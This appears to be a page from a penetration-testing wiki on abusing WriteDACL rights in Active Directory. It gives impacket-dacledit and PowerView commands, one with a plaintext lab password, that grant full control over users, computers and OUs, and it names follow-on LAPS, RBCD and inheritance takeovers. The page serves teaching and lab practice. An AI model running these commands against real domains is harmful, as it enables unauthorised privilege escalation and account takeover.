WriteDACL

Information

With Write access to the target object’s DACL, you can grant yourself any privilege you want on the object.

Grant yourself FullControl of the user:

# Assigning FullControl permissions over the user with Impacket
impacket-dacledit -action write -rights FullControl -principal ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3

# Assigning GenericAll permissions over the user with PowerView
Add-DomainObjectAcl -TargetIdentity harmj0y -Rights All

See here for exploitation options.

Grant yourself FullControl of the computer:

# Assigning GenericAll permissions over the computer
Add-DomainObjectAcl -TargetIdentity windows01 -Rights All

This can be leveraged to read the LAPS password or perform RBCD against the target host.

Grant yourself FullControl of the OU:

Add-DomainObjectAcl -TargetIdentity <OU-GUID> -Rights All

This can be leveraged to add a new ACE to the OU that inherits down to child objects so we can then take over those child objects.

PreviousWriteOwner NextAttacks

Last updated 8 months ago

hashtagInformation

Information